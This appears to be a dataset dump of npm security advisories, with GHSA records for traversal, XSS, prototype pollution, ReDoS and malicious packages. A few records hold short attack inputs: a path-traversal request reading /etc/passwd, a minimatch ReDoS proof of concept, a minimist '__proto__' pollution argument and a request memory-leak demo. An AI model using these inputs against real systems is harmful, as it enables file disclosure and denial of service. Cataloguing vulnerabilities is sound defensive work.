ecosystem
stringclasses 14
values | vuln_id
stringlengths 10
19
| summary
stringlengths 4
267
⌀ | details
stringlengths 9
13.5k
| aliases
stringlengths 17
144
⌀ | modified_date
stringdate 2010-05-27 05:47:00
2022-05-10 08:46:52
| published_date
stringdate 2005-12-31 05:00:00
2022-05-10 08:46:50
| severity
stringclasses 5
values | score
float64 0
10
⌀ | cwe_id
stringclasses 988
values | refs
stringlengths 30
17.7k
⌀ | introduced
stringlengths 75
4.26k
⌀ |
|---|---|---|---|---|---|---|---|---|---|---|---|
npm
|
GHSA-432j-4fw9-2g6f
|
Downloads Resources over HTTP in libsbml
|
Affected versions of `libsbml` insecurely download an executable over an unencrypted HTTP connection.
In scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `libsbml`.
## Recommendation
No patch is currently available for this vulnerability, and the package has not seen an update since 2013.
The best mitigation is currently to avoid using this package, using a different package if available.
Alternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.
|
{'CVE-2016-10668'}
|
2021-01-08T19:57:39Z
|
2019-02-18T23:44:33Z
|
HIGH
| null |
{'CWE-311'}
|
{'https://www.npmjs.com/advisories/272', 'https://nodesecurity.io/advisories/272', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10668', 'https://github.com/advisories/GHSA-432j-4fw9-2g6f'}
| null |
npm
|
GHSA-g7mq-rfj2-25wq
|
Code Injection in total4
|
The package total4 before 0.0.43 are vulnerable to Arbitrary Code Execution via the U.set() and U.get() functions.
|
{'CVE-2021-23390'}
|
2021-07-13T19:43:28Z
|
2021-12-10T17:26:33Z
|
CRITICAL
| null |
{'CWE-94'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23390', 'https://snyk.io/vuln/SNYK-JS-TOTAL4-1130527', 'https://github.com/totaljs/framework4/blob/master/utils.js%23L5430-L5455', 'https://github.com/totaljs/framework4/commit/8a72d8c20f38bbcac031a76a51238aa528f68821'}
| null |
npm
|
GHSA-h9x2-5rm7-x4gm
|
Insecure Comparison in secure-compare
|
Versions of `secure-compare` prior to 3.0.1 are affected by a vulnerability that results in the package always returning true when comparing two strings of the same length, despite differences in the contents of those strings.
## Recommendation
Upgrade to version 3.0.1 or later.
|
{'CVE-2015-9238'}
|
2020-08-31T18:09:18Z
|
2019-06-03T17:28:23Z
|
HIGH
| null |
{'CWE-697'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2015-9238', 'https://github.com/vdemedes/secure-compare/pull/1', 'https://www.npmjs.com/advisories/50', 'https://nodesecurity.io/advisories/50'}
| null |
npm
|
GHSA-rc3x-jf5g-xvc5
|
Open redirect in karma
|
Karma before 6.3.16 is vulnerable to Open Redirect due to missing validation of the return_url query parameter.
|
{'CVE-2021-23495'}
|
2022-03-09T21:08:20Z
|
2022-02-26T00:00:38Z
|
MODERATE
| null |
{'CWE-601'}
|
{'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2412347', 'https://github.com/karma-runner/karma', 'https://nvd.nist.gov/vuln/detail/CVE-2021-23495', 'https://github.com/karma-runner/karma/commit/ff7edbb2ffbcdd69761bece86b7dc1ef0740508d', 'https://snyk.io/vuln/SNYK-JS-KARMA-2396325'}
| null |
npm
|
GHSA-qq89-hq3f-393p
|
Arbitrary File Creation/Overwrite via insufficient symlink protection due to directory cache poisoning using symbolic links
|
### Impact
Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution
node-tar aims to guarantee that any file whose location would be modified by a symbolic link is not extracted. This is, in part, achieved by ensuring that extracted directories are not symlinks. Additionally, in order to prevent unnecessary stat calls to determine whether a given path is a directory, paths are cached when directories are created.
This logic was insufficient when extracting tar files that contained two directories and a symlink with names containing unicode values that normalized to the same value. Additionally, on Windows systems, long path portions would resolve to the same file system entities as their 8.3 "short path" counterparts. A specially crafted tar archive could thus include directories with two forms of the path that resolve to the same file system entity, followed by a symbolic link with a name in the first form, lastly followed by a file using the second form. It led to bypassing node-tar symlink checks on directories, essentially allowing an untrusted tar file to symlink into an arbitrary location and subsequently extracting arbitrary files into that location, thus allowing arbitrary file creation and overwrite.
The v3 branch of `node-tar` has been deprecated and did not receive patches for these issues. If you are still using a v3 release we recommend you update to a more recent version of `node-tar`. If this is not possible, a workaround is available below.
### Patches
6.1.9 || 5.0.10 || 4.4.18
### Workarounds
Users may work around this vulnerability without upgrading by creating a custom filter method which prevents the extraction of symbolic links.
```js
const tar = require('tar')
tar.x({
file: 'archive.tgz',
filter: (file, entry) => {
if (entry.type === 'SymbolicLink') {
return false
} else {
return true
}
}
})
```
Users are encouraged to upgrade to the latest patched versions, rather than attempt to sanitize tar input themselves.
#### Fix
The problem is addressed in the following ways, when comparing paths in the directory cache and path reservation systems:
1. The `String.normalize('NFKD')` method is used to first normalize all unicode to its maximally compatible and multi-code-point form.
2. All slashes are normalized to `/` on Windows systems (on posix systems, `\` is a valid filename character, and thus left intact).
3. When a symbolic link is encountered on Windows systems, the entire directory cache is cleared. Collisions related to use of 8.3 short names to replace directories with other (non-symlink) types of entries may make archives fail to extract properly, but will not result in arbitrary file writes.
|
{'CVE-2021-37712'}
|
2021-08-31T16:02:04Z
|
2021-08-31T16:05:17Z
|
HIGH
| null |
{'CWE-59', 'CWE-22'}
|
{'https://www.npmjs.com/package/tar', 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/npm/node-tar/security/advisories/GHSA-qq89-hq3f-393p', 'https://www.debian.org/security/2021/dsa-5008', 'https://nvd.nist.gov/vuln/detail/CVE-2021-37712', 'https://github.com/npm/node-tar'}
| null |
npm
|
GHSA-xg59-m7wx-853q
|
Cross-site Scripting in node-red-dashboard
|
It is possible to inject JavaScript within node-red-dashboard versions prior to version 2.17.0 due to the ui_notification node accepting raw HTML by default.
|
{'CVE-2019-10756'}
|
2021-08-18T22:03:52Z
|
2019-10-25T19:41:24Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2019-10756', 'https://snyk.io/vuln/SNYK-JS-NODEREDDASHBOARD-471939'}
| null |
npm
|
GHSA-hgjh-723h-mx2j
|
Authorization Bypass Through User-Controlled Key in url-parse
|
url-parse prior to version 1.5.8 is vulnerable to Authorization Bypass Through User-Controlled Key.
|
{'CVE-2022-0686'}
|
2022-03-03T19:19:03Z
|
2022-02-21T00:00:21Z
|
CRITICAL
| null |
{'CWE-639'}
|
{'https://huntr.dev/bounties/55fd06cd-9054-4d80-83be-eb5a454be78c', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0686', 'https://github.com/unshiftio/url-parse', 'https://security.netapp.com/advisory/ntap-20220325-0006/', 'https://github.com/unshiftio/url-parse/commit/d5c64791ef496ca5459ae7f2176a31ea53b127e5'}
| null |
npm
|
GHSA-frcq-4ffq-v4mw
|
Directory Traversal in lessindex
|
Affected versions of `lessindex` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16211'}
|
2020-08-31T18:22:33Z
|
2020-09-01T18:12:07Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/lessindex', 'https://www.npmjs.com/advisories/423', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16211', 'https://nodesecurity.io/advisories/423'}
| null |
npm
|
GHSA-4vvp-x9h2-x2vf
|
Path Traversal in public
|
All versions of `public` are vulnerable to Path Traversal. This vulnerability allows an attacker to access files outside the webroot since it allows symlink navigation in the URL.
## Recommendation
No fix is currently available. Do not use `public` in production or consider using an alternative module until a fix is made available.
| null |
2020-08-31T18:48:53Z
|
2020-09-03T20:26:39Z
|
MODERATE
| null |
{'CWE-22'}
|
{'https://hackerone.com/reports/593911', 'https://www.npmjs.com/advisories/1144'}
| null |
npm
|
GHSA-9m4x-8w29-r78g
|
Server-Side Request Forgery in @uppy/companion
|
The @uppy/companion npm package before versions 1.13.2 and 2.0.0-alpha.5 is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external networks or otherwise interact with internal systems.
|
{'CVE-2020-8205'}
|
2020-08-13T18:54:01Z
|
2020-08-13T18:54:19Z
|
MODERATE
| null |
{'CWE-918'}
|
{'https://hackerone.com/reports/891270', 'https://github.com/transloadit/uppy/blob/master/CHANGELOG.md#1161', 'https://github.com/transloadit/uppy/pull/2322/commits/dbf2f4f30aeaf3bcc5971bb867bb0b5984084828', 'https://nvd.nist.gov/vuln/detail/CVE-2020-8205'}
| null |
npm
|
GHSA-hm82-qr45-h7mw
|
Improperly Controlled Modification of Dynamically-Determined Object Attributes in field
|
Prototype pollution vulnerability in 'field' versions 0.0.1 through 1.0.1 allows attacker to cause a denial of service and may lead to remote code execution.
|
{'CVE-2020-28269'}
|
2021-07-26T18:23:15Z
|
2021-12-10T17:22:58Z
|
CRITICAL
| null |
{'CWE-915'}
|
{'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28269', 'https://nvd.nist.gov/vuln/detail/CVE-2020-28269', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28269,', 'https://github.com/jprichardson/field/blob/2a3811dfc4cdd13833977477d2533534fc61ce06/lib/field.js#L39'}
| null |
npm
|
GHSA-4g46-5grc-wq49
|
Cross-Site Scripting in seeftl
|
All versions of `seeftl` are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize filenames, allowing attackers to execute arbitrary JavaScript in the victim's browser through files with names containing malicious code.
## Recommendation
No fix is currently available. Consider using an alternative package until a fix is made available.
|
{'CVE-2019-15603'}
|
2020-08-31T18:59:46Z
|
2020-04-01T16:36:31Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://www.npmjs.com/advisories/1451', 'https://hackerone.com/reports/665302', 'https://nvd.nist.gov/vuln/detail/CVE-2019-15603'}
| null |
npm
|
GHSA-f78f-353m-cf4j
|
Code Injection in node-rules
|
node-rules including 3.0.0 and prior to 5.0.0 allows injection of arbitrary commands. The argument rules of function "fromJSON()" can be controlled by users without any sanitization.
|
{'CVE-2020-7609'}
|
2021-07-29T16:13:17Z
|
2021-12-10T20:05:37Z
|
CRITICAL
| null |
{'CWE-94'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-7609', 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832', 'https://github.com/mithunsatheesh/node-rules/commit/100862223904bb6478fcc33b701c7dee11f7b832,', 'https://snyk.io/vuln/SNYK-JS-NODERULES-560426'}
| null |
npm
|
GHSA-5379-r78w-42h2
|
Unlimited transforms allowed for signed nodes
|
### Impact
A malicious SAML payload can require transforms that consume significant system resources to process, thereby resulting in reduced or denied service. This would be an effective way to perform a denial-of-service attack.
### Patches
This has been resolved in version 3.1.0. The resolution is to limit the number of allowable transforms to 2.
### References
https://github.com/node-saml/passport-saml/pull/595
|
{'CVE-2021-39171'}
|
2021-08-27T23:25:28Z
|
2021-08-30T16:11:57Z
|
MODERATE
| null |
{'CWE-400'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-39171', 'https://github.com/node-saml/passport-saml/pull/595', 'https://github.com/node-saml/passport-saml/security/advisories/GHSA-5379-r78w-42h2', 'https://github.com/node-saml/passport-saml'}
| null |
npm
|
GHSA-hpcf-8vf9-q4gj
|
XSS in dialog closeText in jquery-ui
|
Affected versions of `jquery-ui` are vulnerable to a cross-site scripting vulnerability when arbitrary user input is supplied as the value of the `closeText` parameter in the `dialog` function.
jQuery-UI is a library for manipulating UI elements via jQuery.
Version 1.11.4 has a cross site scripting (XSS) vulnerability in the `closeText` parameter of the `dialog` function. If your application passes user input to this parameter, it may be vulnerable to XSS via this attack vector.
## Recommendation
Upgrade to jQuery-UI 1.12.0 or later.
|
{'CVE-2016-7103'}
|
2022-02-08T22:08:49Z
|
2017-10-24T18:33:35Z
|
HIGH
| null |
{'CWE-79'}
|
{'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/E2I4UHPIW26FIALH7GGZ3IYUUA53VOOJ/', 'http://rhn.redhat.com/errata/RHSA-2016-2932.html', 'https://github.com/jquery/jquery-ui/commit/9644e7bae9116edaf8d37c5b38cb32b892f10ff6', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E', 'https://www.npmjs.com/advisories/127', 'http://www.securityfocus.com/bid/104823', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html', 'https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E', 'https://www.drupal.org/sa-core-2022-002', 'https://nvd.nist.gov/vuln/detail/CVE-2016-7103', 'https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E', 'https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E', 'https://lists.debian.org/debian-lts-announce/2022/01/msg00014.html', 'https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E', 'http://rhn.redhat.com/errata/RHSA-2016-2933.html', 'https://github.com/jquery/jquery-ui', 'https://jqueryui.com/changelog/1.12.0/', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'http://rhn.redhat.com/errata/RHSA-2017-0161.html', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/advisories/GHSA-hpcf-8vf9-q4gj', 'https://github.com/jquery/jquery-ui/pull/1622', 'https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html', 'https://github.com/jquery/api.jqueryui.com/issues/281', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://security.netapp.com/advisory/ntap-20190416-0007/', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://nodesecurity.io/advisories/127', 'https://www.tenable.com/security/tns-2016-19'}
| null |
npm
|
GHSA-q24h-5rq3-63j9
|
Incorrect Authorization in @uppy/companion
|
@uppy/companion prior to version 3.3.1 is vulnerable to incorrect authorization. A user with URL upload access could enumerate internal companion server networks, send local webservers files to the destination server, and finally download them If each of these files had a guessable and regular name.
|
{'CVE-2022-0528'}
|
2022-03-10T21:57:56Z
|
2022-03-04T00:00:19Z
|
HIGH
| null |
{'CWE-863', 'CWE-200'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2022-0528', 'https://github.com/transloadit/uppy', 'https://github.com/transloadit/uppy/commit/267c34045a1e62c98406d8c31261c604a11e544a', 'https://huntr.dev/bounties/8b060cc3-2420-468e-8293-b9216620175b'}
| null |
npm
|
GHSA-hxm2-r34f-qmc5
|
Regular Expression Denial of Service in minimatch
|
Affected versions of `minimatch` are vulnerable to regular expression denial of service attacks when user input is passed into the `pattern` argument of `minimatch(path, pattern)`.
## Proof of Concept
```
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
```
## Recommendation
Update to version 3.0.2 or later.
|
{'CVE-2016-10540'}
|
2021-06-10T23:23:41Z
|
2018-10-09T00:40:41Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://github.com/advisories/GHSA-hxm2-r34f-qmc5', 'https://nodesecurity.io/advisories/118', 'https://nvd.nist.gov/vuln/detail/CVE-2016-10540', 'https://www.npmjs.com/advisories/118'}
| null |
npm
|
GHSA-m93v-9qjc-3g79
|
Context isolation bypass via leaked cross-context objects in Electron
|
### Impact
Apps using `contextIsolation` are affected.
This is a context isolation bypass, meaning that code running in the main world context in the renderer can reach into the isolated Electron context and perform privileged actions.
### Workarounds
There are no app-side workarounds, you must update your Electron version to be protected.
### Fixed Versions
* `9.0.0-beta.21`
* `8.2.4`
* `7.2.4`
### Non-Impacted Versions
* `9.0.0-beta.*`
### For more information
If you have any questions or comments about this advisory:
* Email us at [security@electronjs.org](mailto:security@electronjs.org)
|
{'CVE-2020-4076'}
|
2021-01-07T23:48:11Z
|
2020-07-07T00:01:07Z
|
HIGH
| null |
{'CWE-501'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2020-4076', 'https://github.com/electron/electron/security/advisories/GHSA-m93v-9qjc-3g79', 'https://www.electronjs.org/releases/stable?page=3#release-notes-for-v824'}
| null |
npm
|
GHSA-wv26-rj8c-4r33
|
Moderate severity vulnerability that affects auth0-js
|
CSRF exists in the Auth0 authentication service through 14591 if the Legacy Lock API flag is enabled.
|
{'CVE-2018-6874'}
|
2021-09-21T21:53:18Z
|
2018-11-06T23:15:13Z
|
HIGH
| null |
{'CWE-352'}
|
{'http://www.securityfocus.com/bid/103695', 'https://github.com/advisories/GHSA-wv26-rj8c-4r33', 'https://nvd.nist.gov/vuln/detail/CVE-2018-6874', 'https://auth0.com/docs/security/bulletins/cve-2018-6874'}
| null |
npm
|
GHSA-8w65-xjc5-9w79
|
Cross-Site Scripting in node-red
|
Versions of `node-red` prior to 0.20.8are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize the `name` field in new Flows, allowing attackers to execute arbitrary JavaScript in the victim's browser.
## Recommendation
Upgrade to version 0.18.6 or later.
|
{'CVE-2019-15607'}
|
2020-08-31T18:59:55Z
|
2020-01-30T21:00:21Z
|
MODERATE
| null |
{'CWE-79'}
|
{'https://hackerone.com/reports/681986', 'https://www.npmjs.com/advisories/1456', 'https://nvd.nist.gov/vuln/detail/CVE-2019-15607'}
| null |
npm
|
GHSA-4jqc-8m5r-9rpr
|
Prototype Pollution in set-value
|
This affects the package `set-value` before 2.0.1, and starting with 3.0.0 but prior to 4.0.1. A type confusion vulnerability can lead to a bypass of CVE-2019-10747 when the user-provided keys used in the path parameter are arrays.
|
{'CVE-2021-23440'}
|
2022-03-30T21:18:05Z
|
2021-09-13T20:09:36Z
|
HIGH
| null |
{'CWE-843', 'CWE-1321'}
|
{'https://nvd.nist.gov/vuln/detail/CVE-2021-23440', 'https://github.com/jonschlinkert/set-value/pull/33', 'https://github.com/jonschlinkert/set-value', 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1584212', 'https://www.huntr.dev/bounties/2eae1159-01de-4f82-a177-7478a408c4a2/', 'https://snyk.io/vuln/SNYK-JS-SETVALUE-1540541', 'https://www.oracle.com/security-alerts/cpujan2022.html', 'https://github.com/jonschlinkert/set-value/commit/7cf8073bb06bf0c15e08475f9f952823b4576452'}
| null |
npm
|
GHSA-vh95-rmgr-6w4m
|
Prototype Pollution in minimist
|
Affected versions of `minimist` are vulnerable to prototype pollution. Arguments are not properly sanitized, allowing an attacker to modify the prototype of `Object`, causing the addition or modification of an existing property that will exist on all objects.
Parsing the argument `--__proto__.y=Polluted` adds a `y` property with value `Polluted` to all objects. The argument `--__proto__=Polluted` raises and uncaught error and crashes the application.
This is exploitable if attackers have control over the arguments being passed to `minimist`.
## Recommendation
Upgrade to versions 0.2.1, 1.2.3 or later.
|
{'CVE-2020-7598'}
|
2022-04-26T21:01:40Z
|
2020-04-03T21:48:32Z
|
MODERATE
| null |
{'CWE-1321'}
|
{'https://www.npmjs.com/advisories/1179', 'http://lists.opensuse.org/opensuse-security-announce/2020-06/msg00024.html', 'https://snyk.io/vuln/SNYK-JS-MINIMIST-559764', 'https://github.com/substack/minimist', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7598', 'https://github.com/substack/minimist/commit/38a4d1caead72ef99e824bb420a2528eec03d9ab', 'https://github.com/substack/minimist/commit/63e7ed05aa4b1889ec2f3b196426db4500cbda94', 'https://github.com/substack/minimist/commit/4cf1354839cb972e38496d35e12f806eea92c11f#diff-a1e0ee62c91705696ddb71aa30ad4f95'}
| null |
npm
|
GHSA-h698-r4hm-w94p
|
Validation Bypass in paypal-ipn
|
Versions 2.x.x and earlier of `paypal-ipn` are affected by a validation bypass vulnerability.
paypal-ipn uses the `test_ipn` parameter (which is set by the PayPal IPN simulator) to determine if it should use the production PayPal site or the sandbox.
A motivated attacker could craft a request string using the simulator to fool the application into entering the sandbox mode, potentially allowing purchases without valid payment.
## Recommendation
Upgrade to version 3.0.0 or later.
|
{'CVE-2014-10067'}
|
2021-09-23T20:58:30Z
|
2020-08-31T22:54:56Z
|
MODERATE
| null |
{'CWE-287'}
|
{'https://github.com/andzdroid/paypal-ipn/issues/11', 'https://nvd.nist.gov/vuln/detail/CVE-2014-10067', 'https://www.npmjs.com/advisories/26', 'https://github.com/andzdroid/paypal-ipn', 'https://nodesecurity.io/advisories/26'}
| null |
npm
|
GHSA-j67m-jg9p-ppg4
|
Malicious Package in ns-sha3
|
Version 0.8.0 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-10-01T16:10:45Z
|
2020-09-03T23:18:05Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1298'}
| null |
npm
|
GHSA-2gjg-5x33-mmp2
|
Path Traversal in localhost-now
|
Versions of `localhost-now` before 1.0.2 are vulnerable to path traversal. This allows a remote attacker to read the content of an arbitrary file.
## Recommendation
Update to version 1.0.2 or later.
|
{'CVE-2018-3729'}
|
2020-08-31T18:28:41Z
|
2018-07-25T22:44:05Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://github.com/DCKT/localhost-now/commit/30b004c7f145d677df8800a106c2edc982313995#diff-b9cfc7f2cdf78a7f4b91a753d10865a2', 'https://www.npmjs.com/advisories/582', 'https://hackerone.com/reports/312889', 'https://github.com/advisories/GHSA-2gjg-5x33-mmp2', 'https://nvd.nist.gov/vuln/detail/CVE-2018-3729'}
| null |
npm
|
GHSA-x5pg-88wf-qq4p
|
Regular Expression Denial of Service in marked
|
Affected versions of `marked` are vulnerable to a regular expression denial of service.
The amplification in this vulnerability is significant, with 1,000 characters resulting in the event loop being blocked for around 6 seconds.
## Recommendation
Update to version 0.3.9 or later.
|
{'CVE-2017-16114'}
|
2020-08-31T18:26:39Z
|
2018-07-24T20:10:52Z
|
HIGH
| null |
{'CWE-400'}
|
{'https://nodesecurity.io/advisories/531', 'https://github.com/advisories/GHSA-x5pg-88wf-qq4p', 'https://github.com/chjj/marked/issues/937', 'https://www.npmjs.com/advisories/531', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16114'}
| null |
npm
|
GHSA-m69q-pmxg-vqch
|
Directory Traversal in cypserver
|
Affected versions of `cypserver` resolve relative file paths, resulting in a directory traversal vulnerability. A malicious actor can use this vulnerability to access files outside of the intended directory root, which may result in the disclosure of private files on the vulnerable system.
Example request:
```
GET /../../../../../../../../../../etc/passwd HTTP/1.1
host:foo
```
## Recommendation
No patch is available for this vulnerability.
It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
|
{'CVE-2017-16191'}
|
2020-08-31T18:23:13Z
|
2020-09-01T18:26:00Z
|
HIGH
| null |
{'CWE-22'}
|
{'https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/cypserver', 'https://www.npmjs.com/advisories/440', 'https://nodesecurity.io/advisories/440', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16191'}
| null |
npm
|
GHSA-7xf6-cpxm-5mx9
|
Malicious Package in bufner-xor
|
Version 2.0.2 contained malicious code. The package targeted the Ethereum cryptocurrency and performed transactions to wallets not controlled by the user.
## Recommendation
Remove the package from your environment. Ensure no Ethereum funds were compromised.
| null |
2021-09-29T21:35:53Z
|
2020-09-03T22:27:18Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/1264'}
| null |
npm
|
GHSA-jh2m-j8pp-55rc
|
Prototype Pollution in gedi
|
All versions of package gedi up to and including version 1.6.3 are vulnerable to Prototype Pollution via the set function.
|
{'CVE-2020-7727'}
|
2021-05-05T18:26:34Z
|
2021-05-06T18:12:47Z
|
CRITICAL
| null |
{'CWE-1321'}
|
{'https://snyk.io/vuln/SNYK-JS-GEDI-598803', 'https://nvd.nist.gov/vuln/detail/CVE-2020-7727'}
| null |
npm
|
GHSA-c36v-fmgq-m8hx
|
Prototype Pollution in immer
|
immer is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
|
{'CVE-2021-3757'}
|
2021-09-03T20:17:21Z
|
2021-09-07T22:57:14Z
|
HIGH
| null |
{'CWE-915', 'CWE-1321'}
|
{'https://github.com/immerjs/immer', 'https://huntr.dev/bounties/23d38099-71cd-42ed-a77a-71e68094adfa', 'https://nvd.nist.gov/vuln/detail/CVE-2021-3757', 'https://github.com/immerjs/immer/commit/fa671e55ee9bd42ae08cc239102b665a23958237'}
| null |
npm
|
GHSA-vwhc-pww7-72x6
|
Code Injection in total.js
|
Total.js framework (npm package total.js) is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. In total.js framework before version 3.4.9, calling the utils.set function with user-controlled values leads to code-injection. This can cause a variety of impacts that include arbitrary code execution. This is fixed in version 3.4.9.
|
{'CVE-2021-32831'}
|
2021-08-31T20:25:52Z
|
2021-09-01T18:24:05Z
|
HIGH
| null |
{'CWE-94'}
|
{'https://securitylab.github.com/advisories/GHSL-2021-066-totaljs-totaljs/', 'https://github.com/totaljs/framework/commit/887b0fa9e162ef7a2dd9cec20a5ca122726373b3', 'https://nvd.nist.gov/vuln/detail/CVE-2021-32831', 'https://www.npmjs.com/package/total.js', 'https://github.com/totaljs/framework/blob/e644167d5378afdc45cb0156190349b2c07ef235/changes.txt#L11', 'https://github.com/totaljs'}
| null |
npm
|
GHSA-7xfp-9c55-5vqj
|
Remote Memory Exposure in request
|
Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body.
## Proof of Concept
```
var request = require('request');
var http = require('http');
var serveFunction = function (req, res){
req.on('data', function (data) {
console.log(data)
});
res.end();
};
var server = http.createServer(serveFunction);
server.listen(8000);
request({
method: "POST",
uri: 'http://localhost:8000',
multipart: [{body:500}]
},function(err,res,body){});
```
## Recommendation
Update to version 2.68.0 or later
|
{'CVE-2017-16026'}
|
2021-01-08T19:13:45Z
|
2018-11-09T17:44:01Z
|
MODERATE
| null |
{'CWE-201'}
|
{'https://github.com/request/request/issues/1904', 'https://github.com/request/request/pull/2018', 'https://www.npmjs.com/advisories/309', 'https://github.com/advisories/GHSA-7xfp-9c55-5vqj', 'https://nvd.nist.gov/vuln/detail/CVE-2017-16026', 'https://nodesecurity.io/advisories/309'}
| null |
npm
|
GHSA-m6w8-fq7v-ph4m
|
GovernorCompatibilityBravo incorrect ABI encoding may lead to unexpected behavior
|
### Impact
The `GovernorCompatibilityBravo` module may lead to the creation of governance proposals that execute function calls with incorrect arguments due to bad ABI encoding. This happens if the proposal is created using explicit function signatures, e.g. a proposal to invoke the function `foo(uint256)` is created as `propose([target], [0], ["foo(uint256)"], ["0x00..01"])`. If the function selector is provided as part of the encoded proposal data the issue is not present, e.g. the same proposal is created as `propose([target], [0], ["0x2fbebd3800..01"])`, where `2fbebd38` is the function selector.
We've assessed the instances of this contract found on chain, and did not find any occurrence of this bug in the past. Proposal creation through Tally or OpenZeppelin Defender is not affected. The core `Governor` contract on its own is not affected.
### Patches
A fix is included in version v4.4.2 of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`.
### Workarounds
Do not create proposals using explicit function signatures. Instead, use the `propose` function without the `signatures` argument, and create the proposal using the fully ABI-encoded function call including the function selector in the `calldatas` argument as explained above.
### References
https://github.com/OpenZeppelin/openzeppelin-contracts/issues/3099
### Credits
This issue was identified and reported by @GeraldHost.
### For more information
If you have any questions, comments, or need assistance regarding this advisory, email us at security@openzeppelin.com.
To submit security reports please use [our bug bounty on Immunefi](https://immunefi.com/bounty/openzeppelin/).
| null |
2022-01-12T21:38:27Z
|
2022-01-13T16:09:36Z
|
MODERATE
| null | null |
{'https://github.com/OpenZeppelin/openzeppelin-contracts', 'https://github.com/OpenZeppelin/openzeppelin-contracts/security/advisories/GHSA-m6w8-fq7v-ph4m'}
| null |
npm
|
GHSA-vcg5-9xw6-r56c
|
Malicious Package in logsymbles
|
Version 2.2.0 of `logsymbles` contains malicious code as a preinstall script. The package is malware designed to take advantage of users making a mistake when typing the name of a module to install. When installed, the package downloads a file from a remote server, executes it and opens a backdoor.
## Recommendation
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.
The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
| null |
2021-09-30T21:55:54Z
|
2020-09-02T21:40:49Z
|
CRITICAL
| null |
{'CWE-506'}
|
{'https://www.npmjs.com/advisories/908'}
| null |
npm
|
GHSA-fc42-h7q4-qp8h
|
